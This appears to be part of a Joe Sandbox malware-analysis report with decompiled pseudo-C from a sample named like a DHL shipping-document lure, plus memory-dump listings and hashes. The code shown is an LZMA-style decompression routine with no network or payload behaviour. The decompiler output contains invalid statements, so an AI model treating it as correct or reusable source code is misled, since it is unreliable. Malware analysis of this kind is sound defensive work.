                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t156 = __ebp - 0x70;
                        												 *_t156 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t156;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												while(1) {
                        													L48:
                        													__eflags = __ebx - 0x100;
                        													if(__ebx >= 0x100) {
                        														break;
                        													}
                        													__eax =  *(__ebp - 0x58);
                        													__edx = __ebx + __ebx;
                        													__ecx =  *(__ebp - 0x10);
                        													__esi = __edx + __eax;
                        													__ecx =  *(__ebp - 0x10) >> 0xb;
                        													__ax =  *__esi;
                        													 *(__ebp - 0x54) = __esi;
                        													__edi = __ax & 0x0000ffff;
                        													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        													__eflags =  *(__ebp - 0xc) - __ecx;
                        													if( *(__ebp - 0xc) >= __ecx) {
                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        														__cx = __ax;
                        														_t170 = __edx + 1; // 0x1
                        														__ebx = _t170;
                        														__cx = __ax >> 5;
                        														__eflags = __eax;
                        														 *__esi = __ax;
                        													} else {
                        														 *(__ebp - 0x10) = __ecx;
                        														0x800 = 0x800 - __edi;
                        														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        														__ebx = __ebx + __ebx;
                        														 *__esi = __cx;
                        													}
                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                        													 *(__ebp - 0x44) = __ebx;
                        													if( *(__ebp - 0x10) >= 0x1000000) {
                        														continue;
                        													} else {
                        														goto L46;
                        													}
                        												}
                        												L54:
                        												_t173 = __ebp - 0x34;
                        												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                        												__eflags =  *_t173;
                        												goto L55;
                        											case 0xf:
                        												L58:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0xf;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t203 = __ebp - 0x70;
                        												 *_t203 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t203;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												L60:
                        												__eflags = __ebx - 0x100;
                        												if(__ebx >= 0x100) {
                        													L55:
                        													__al =  *(__ebp - 0x44);
                        													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                        													goto L56;
                        												}
                        												L61:
                        												__eax =  *(__ebp - 0x58);
                        												__edx = __ebx + __ebx;
                        												__ecx =  *(__ebp - 0x10);
                        												__esi = __edx + __eax;
                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                        												__ax =  *__esi;
                        												 *(__ebp - 0x54) = __esi;
                        												__edi = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													_t217 = __edx + 1; // 0x1
                        													__ebx = _t217;
                        													__cx = __ax >> 5;
                        													__eflags = __eax;
                        													 *__esi = __ax;
                        												} else {
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edi;
                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        													__ebx = __ebx + __ebx;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													goto L60;
                        												} else {
                        													goto L58;
                        												}
                        											case 0x10:
                        												L109:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0x10;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t365 = __ebp - 0x70;
                        												 *_t365 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t365;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												goto L111;
                        											case 0x11:
                        												goto L69;
                        											case 0x12:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__eax =  *(__ebp - 0x58);
                        													 *(__ebp - 0x84) = 0x13;
                        													__esi =  *(__ebp - 0x58) + 2;
                        													while(1) {
                        														L132:
                        														 *(_t613 - 0x54) = _t606;
                        														goto L133;
                        													}
                        												}
                        												__eax =  *(__ebp - 0x4c);
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                        												__ecx =  *(__ebp - 0x58);
                        												__eax =  *(__ebp - 0x4c) << 4;
                        												__eflags = __eax;
                        												__eax =  *(__ebp - 0x58) + __eax + 4;
                        												goto L130;
                        											case 0x13:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													_t469 = __ebp - 0x58;
                        													 *_t469 =  *(__ebp - 0x58) + 0x204;
                        													__eflags =  *_t469;
                        													 *(__ebp - 0x30) = 0x10;
                        													 *(__ebp - 0x40) = 8;
                        													L144:
                        													 *(__ebp - 0x7c) = 0x14;
                        													goto L145;
                        												}
                        												__eax =  *(__ebp - 0x4c);
                        												__ecx =  *(__ebp - 0x58);
                        												__eax =  *(__ebp - 0x4c) << 4;
                        												 *(__ebp - 0x30) = 8;
                        												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                        												L130:
                        												 *(__ebp - 0x58) = __eax;
                        												 *(__ebp - 0x40) = 3;
                        												goto L144;
                        											case 0x14:
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                        												__eax =  *(__ebp - 0x80);
                        												 *(_t613 - 0x88) = _t533;
                        												goto L1;
                        											case 0x15:
                        												__eax = 0;
                        												__eflags =  *(__ebp - 0x38) - 7;
                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        												__al = __al & 0x000000fd;
                        												__eax = (__eflags >= 0) - 1 + 0xb;
                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                        												goto L120;
                        											case 0x16:
                        												__eax =  *(__ebp - 0x30);
                        												__eflags = __eax - 4;
                        												if(__eax >= 4) {
                        													_push(3);
                        													_pop(__eax);
                        												}
                        												__ecx =  *(__ebp - 4);
                        												 *(__ebp - 0x40) = 6;
                        												__eax = __eax << 7;
                        												 *(__ebp - 0x7c) = 0x19;
                        												 *(__ebp - 0x58) = __eax;
                        												goto L145;
                        											case 0x17:
                        												L145:
                        												__eax =  *(__ebp - 0x40);
                        												 *(__ebp - 0x50) = 1;
                        												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                        												goto L149;
                        											case 0x18:
                        												L146:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0x18;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t484 = __ebp - 0x70;
                        												 *_t484 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t484;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												L148:
                        												_t487 = __ebp - 0x48;
                        												 *_t487 =  *(__ebp - 0x48) - 1;
                        												__eflags =  *_t487;
                        												L149:
                        												__eflags =  *(__ebp - 0x48);
                        												if( *(__ebp - 0x48) <= 0) {
                        													__ecx =  *(__ebp - 0x40);
                        													__ebx =  *(__ebp - 0x50);
                        													0 = 1;
                        													__eax = 1 << __cl;
                        													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                        													__eax =  *(__ebp - 0x7c);
                        													 *(__ebp - 0x44) = __ebx;
                        													while(1) {
                        														 *(_t613 - 0x88) = _t533;
                        														goto L1;
                        													}
                        												}
                        												__eax =  *(__ebp - 0x50);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        												__eax =  *(__ebp - 0x58);
                        												__esi = __edx + __eax;
                        												 *(__ebp - 0x54) = __esi;
                        												__ax =  *__esi;
                        												__edi = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													__cx = __ax >> 5;
                        													__eax = __eax - __ecx;
                        													__edx = __edx + 1;
                        													__eflags = __edx;
                        													 *__esi = __ax;
                        													 *(__ebp - 0x50) = __edx;
                        												} else {
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edi;
                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													goto L148;
                        												} else {
                        													goto L146;
                        												}
                        											case 0x19:
                        												__eflags = __ebx - 4;
                        												if(__ebx < 4) {
                        													 *(__ebp - 0x2c) = __ebx;
                        													L119:
                        													_t393 = __ebp - 0x2c;
                        													 *_t393 =  *(__ebp - 0x2c) + 1;
                        													__eflags =  *_t393;
                        													L120:
                        													__eax =  *(__ebp - 0x2c);
                        													__eflags = __eax;
                        													if(__eax == 0) {
                        														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                        														goto L170;
                        													}
                        													__eflags = __eax -  *(__ebp - 0x60);
                        													if(__eax >  *(__ebp - 0x60)) {
                        														goto L171;
                        													}
                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                        													__eax =  *(__ebp - 0x30);
                        													_t400 = __ebp - 0x60;
                        													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                        													__eflags =  *_t400;
                        													goto L123;
                        												}
                        												__ecx = __ebx;
                        												__eax = __ebx;
                        												__ecx = __ebx >> 1;
                        												__eax = __ebx & 0x00000001;
                        												__ecx = (__ebx >> 1) - 1;
                        												__al = __al | 0x00000002;
                        												__eax = (__ebx & 0x00000001) << __cl;
                        												__eflags = __ebx - 0xe;
                        												 *(__ebp - 0x2c) = __eax;
                        												if(__ebx >= 0xe) {
                        													__ebx = 0;
                        													 *(__ebp - 0x48) = __ecx;
                        													L102:
                        													__eflags =  *(__ebp - 0x48);
                        													if( *(__ebp - 0x48) <= 0) {
                        														__eax = __eax + __ebx;
                        														 *(__ebp - 0x40) = 4;
                        														 *(__ebp - 0x2c) = __eax;
                        														__eax =  *(__ebp - 4);
                        														__eax =  *(__ebp - 4) + 0x644;
                        														__eflags = __eax;
                        														L108:
                        														__ebx = 0;
                        														 *(__ebp - 0x58) = __eax;
                        														 *(__ebp - 0x50) = 1;
                        														 *(__ebp - 0x44) = 0;
                        														 *(__ebp - 0x48) = 0;
                        														L112:
                        														__eax =  *(__ebp - 0x40);
                        														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                        															_t391 = __ebp - 0x2c;
                        															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                        															__eflags =  *_t391;
                        															goto L119;
                        														}
                        														__eax =  *(__ebp - 0x50);
                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        														__eax =  *(__ebp - 0x58);
                        														__esi = __edi + __eax;
                        														 *(__ebp - 0x54) = __esi;
                        														__ax =  *__esi;
                        														__ecx = __ax & 0x0000ffff;
                        														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                        														__eflags =  *(__ebp - 0xc) - __edx;
                        														if( *(__ebp - 0xc) >= __edx) {
                        															__ecx = 0;
                        															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                        															__ecx = 1;
                        															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                        															__ebx = 1;
                        															__ecx =  *(__ebp - 0x48);
                        															__ebx = 1 << __cl;
                        															__ecx = 1 << __cl;
                        															__ebx =  *(__ebp - 0x44);
                        															__ebx =  *(__ebp - 0x44) | __ecx;
                        															__cx = __ax;
                        															__cx = __ax >> 5;
                        															__eax = __eax - __ecx;
                        															__edi = __edi + 1;
                        															__eflags = __edi;
                        															 *(__ebp - 0x44) = __ebx;
                        															 *__esi = __ax;
                        															 *(__ebp - 0x50) = __edi;
                        														} else {
                        															 *(__ebp - 0x10) = __edx;
                        															0x800 = 0x800 - __ecx;
                        															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                        															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        															 *__esi = __dx;
                        														}
                        														__eflags =  *(__ebp - 0x10) - 0x1000000;
                        														if( *(__ebp - 0x10) >= 0x1000000) {
                        															L111:
                        															_t368 = __ebp - 0x48;
                        															 *_t368 =  *(__ebp - 0x48) + 1;
                        															__eflags =  *_t368;
                        															goto L112;
                        														} else {
                        															goto L109;
                        														}
                        													}
                        													__ecx =  *(__ebp - 0xc);
                        													__ebx = __ebx + __ebx;
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                        													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        													 *(__ebp - 0x44) = __ebx;
                        													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                        														__ecx =  *(__ebp - 0x10);
                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        														__ebx = __ebx | 0x00000001;
                        														__eflags = __ebx;
                        														 *(__ebp - 0x44) = __ebx;
                        													}
                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                        													if( *(__ebp - 0x10) >= 0x1000000) {
                        														L101:
                        														_t338 = __ebp - 0x48;
                        														 *_t338 =  *(__ebp - 0x48) - 1;
                        														__eflags =  *_t338;
                        														goto L102;
                        													} else {
                        														goto L99;
                        													}
                        												}
                        												__edx =  *(__ebp - 4);
                        												__eax = __eax - __ebx;
                        												 *(__ebp - 0x40) = __ecx;
                        												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                        												goto L108;
                        											case 0x1a:
                        												L56:
                        												__eflags =  *(__ebp - 0x64);
                        												if( *(__ebp - 0x64) == 0) {
                        													 *(__ebp - 0x88) = 0x1a;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x68);
                        												__al =  *(__ebp - 0x5c);
                        												__edx =  *(__ebp - 8);
                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        												 *( *(__ebp - 0x68)) = __al;
                        												__ecx =  *(__ebp - 0x14);
                        												 *(__ecx +  *(__ebp - 8)) = __al;
                        												__eax = __ecx + 1;
                        												__edx = 0;
                        												_t192 = __eax %  *(__ebp - 0x74);
                        												__eax = __eax /  *(__ebp - 0x74);
                        												__edx = _t192;
                        												goto L80;
                        											case 0x1b:
                        												L76:
                        												__eflags =  *(__ebp - 0x64);
                        												if( *(__ebp - 0x64) == 0) {
                        													 *(__ebp - 0x88) = 0x1b;
                        													goto L170;
                        												}
                        												__eax =  *(__ebp - 0x14);
                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        												__eflags = __eax -  *(__ebp - 0x74);
                        												if(__eax >=  *(__ebp - 0x74)) {
                        													__eax = __eax +  *(__ebp - 0x74);
                        													__eflags = __eax;
                        												}
                        												__edx =  *(__ebp - 8);
                        												__cl =  *(__eax + __edx);
                        												__eax =  *(__ebp - 0x14);
                        												 *(__ebp - 0x5c) = __cl;
                        												 *(__eax + __edx) = __cl;
                        												__eax = __eax + 1;
                        												__edx = 0;
                        												_t275 = __eax %  *(__ebp - 0x74);
                        												__eax = __eax /  *(__ebp - 0x74);
                        												__edx = _t275;
                        												__eax =  *(__ebp - 0x68);
                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        												_t284 = __ebp - 0x64;
                        												 *_t284 =  *(__ebp - 0x64) - 1;
                        												__eflags =  *_t284;
                        												 *( *(__ebp - 0x68)) = __cl;
                        												L80:
                        												 *(__ebp - 0x14) = __edx;
                        												goto L81;
                        											case 0x1c:
                        												while(1) {
                        													L123:
                        													__eflags =  *(__ebp - 0x64);
                        													if( *(__ebp - 0x64) == 0) {
                        														break;
                        													}
                        													__eax =  *(__ebp - 0x14);
                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        													__eflags = __eax -  *(__ebp - 0x74);
                        													if(__eax >=  *(__ebp - 0x74)) {
                        														__eax = __eax +  *(__ebp - 0x74);
                        														__eflags = __eax;
                        													}
                        													__edx =  *(__ebp - 8);
                        													__cl =  *(__eax + __edx);
                        													__eax =  *(__ebp - 0x14);
                        													 *(__ebp - 0x5c) = __cl;
                        													 *(__eax + __edx) = __cl;
                        													__eax = __eax + 1;
                        													__edx = 0;
                        													_t414 = __eax %  *(__ebp - 0x74);
                        													__eax = __eax /  *(__ebp - 0x74);
                        													__edx = _t414;
                        													__eax =  *(__ebp - 0x68);
                        													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                        													__eflags =  *(__ebp - 0x30);
                        													 *( *(__ebp - 0x68)) = __cl;
                        													 *(__ebp - 0x14) = _t414;
                        													if( *(__ebp - 0x30) > 0) {
                        														continue;
                        													} else {
                        														L81:
                        														 *(__ebp - 0x88) = 2;
                        														goto L1;
                        													}
                        												}
                        												 *(__ebp - 0x88) = 0x1c;
                        												goto L170;
                        										}
                        									}
                        									L171:
                        									_t535 = _t534 | 0xffffffff;
                        									goto L172;
                        								}
                        							}
                        						}
                        					}
                        					goto L1;
                        				}
                        			}













                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004073ce
                        0x004073cb
                        0x00000000
                        0x00407120

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                        • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                        • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                        • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E00407068() {
                        				unsigned short _t531;
                        				signed int _t532;
                        				void _t533;
                        				signed int _t534;
                        				signed int _t535;
                        				signed int _t565;
                        				signed int _t568;
                        				signed int _t589;
                        				signed int* _t606;
                        				void* _t613;
                        
                        				L0:
                        				while(1) {
                        					L0:
                        					if( *(_t613 - 0x40) != 0) {
                        						 *(_t613 - 0x84) = 0xa;
                        						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                        					} else {
                        						 *(__ebp - 0x84) = 9;
                        						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                        					}
                        					while(1) {
                        						 *(_t613 - 0x54) = _t606;
                        						while(1) {
                        							L133:
                        							_t531 =  *_t606;
                        							_t589 = _t531 & 0x0000ffff;
                        							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                        							if( *(_t613 - 0xc) >= _t565) {
                        								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                        								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                        								 *(_t613 - 0x40) = 1;
                        								_t532 = _t531 - (_t531 >> 5);
                        								 *_t606 = _t532;
                        							} else {
                        								 *(_t613 - 0x10) = _t565;
                        								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                        								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                        							}
                        							if( *(_t613 - 0x10) >= 0x1000000) {
                        								goto L139;
                        							}
                        							L137:
                        							if( *(_t613 - 0x6c) == 0) {
                        								 *(_t613 - 0x88) = 5;
                        								L170:
                        								_t568 = 0x22;
                        								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                        								_t535 = 0;
                        								L172:
                        								return _t535;
                        							}
                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                        							L139:
                        							_t533 =  *(_t613 - 0x84);
                        							while(1) {
                        								 *(_t613 - 0x88) = _t533;
                        								while(1) {
                        									L1:
                        									_t534 =  *(_t613 - 0x88);
                        									if(_t534 > 0x1c) {
                        										break;
                        									}
                        									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                        										case 0:
                        											if( *(_t613 - 0x6c) == 0) {
                        												goto L170;
                        											}
                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        											_t534 =  *( *(_t613 - 0x70));
                        											if(_t534 > 0xe1) {
                        												goto L171;
                        											}
                        											_t538 = _t534 & 0x000000ff;
                        											_push(0x2d);
                        											asm("cdq");
                        											_pop(_t570);
                        											_push(9);
                        											_pop(_t571);
                        											_t609 = _t538 / _t570;
                        											_t540 = _t538 % _t570 & 0x000000ff;
                        											asm("cdq");
                        											_t604 = _t540 % _t571 & 0x000000ff;
                        											 *(_t613 - 0x3c) = _t604;
                        											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                        											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                        											_t612 = (0x300 << _t604 + _t609) + 0x736;
                        											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                        												L10:
                        												if(_t612 == 0) {
                        													L12:
                        													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                        													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                        													goto L15;
                        												} else {
                        													goto L11;
                        												}
                        												do {
                        													L11:
                        													_t612 = _t612 - 1;
                        													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                        												} while (_t612 != 0);
                        												goto L12;
                        											}
                        											if( *(_t613 - 4) != 0) {
                        												GlobalFree( *(_t613 - 4));
                        											}
                        											_t534 = GlobalAlloc(0x40, 0x600); // executed
                        											 *(_t613 - 4) = _t534;
                        											if(_t534 == 0) {
                        												goto L171;
                        											} else {
                        												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                        												goto L10;
                        											}
                        										case 1:
                        											L13:
                        											__eflags =  *(_t613 - 0x6c);
                        											if( *(_t613 - 0x6c) == 0) {
                        												 *(_t613 - 0x88) = 1;
                        												goto L170;
                        											}
                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                        											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        											_t45 = _t613 - 0x48;
                        											 *_t45 =  *(_t613 - 0x48) + 1;
                        											__eflags =  *_t45;
                        											L15:
                        											if( *(_t613 - 0x48) < 4) {
                        												goto L13;
                        											}
                        											_t546 =  *(_t613 - 0x40);
                        											if(_t546 ==  *(_t613 - 0x74)) {
                        												L20:
                        												 *(_t613 - 0x48) = 5;
                        												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                        												goto L23;
                        											}
                        											 *(_t613 - 0x74) = _t546;
                        											if( *(_t613 - 8) != 0) {
                        												GlobalFree( *(_t613 - 8));
                        											}
                        											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                        											 *(_t613 - 8) = _t534;
                        											if(_t534 == 0) {
                        												goto L171;
                        											} else {
                        												goto L20;
                        											}
                        										case 2:
                        											L24:
                        											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                        											 *(_t613 - 0x84) = 6;
                        											 *(_t613 - 0x4c) = _t553;
                        											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                        											 *(_t613 - 0x54) = _t606;
                        											goto L133;
                        										case 3:
                        											L21:
                        											__eflags =  *(_t613 - 0x6c);
                        											if( *(_t613 - 0x6c) == 0) {
                        												 *(_t613 - 0x88) = 3;
                        												goto L170;
                        											}
                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        											_t67 = _t613 - 0x70;
                        											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                        											__eflags =  *_t67;
                        											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                        											L23:
                        											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                        											if( *(_t613 - 0x48) != 0) {
                        												goto L21;
                        											}
                        											goto L24;
                        										case 4:
                        											L133:
                        											_t531 =  *_t606;
                        											_t589 = _t531 & 0x0000ffff;
                        											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                        											if( *(_t613 - 0xc) >= _t565) {
                        												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                        												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                        												 *(_t613 - 0x40) = 1;
                        												_t532 = _t531 - (_t531 >> 5);
                        												 *_t606 = _t532;
                        											} else {
                        												 *(_t613 - 0x10) = _t565;
                        												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                        												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                        											}
                        											if( *(_t613 - 0x10) >= 0x1000000) {
                        												goto L139;
                        											}
                        										case 5:
                        											goto L137;
                        										case 6:
                        											__edx = 0;
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x34) = 1;
                        												 *(__ebp - 0x84) = 7;
                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                        												while(1) {
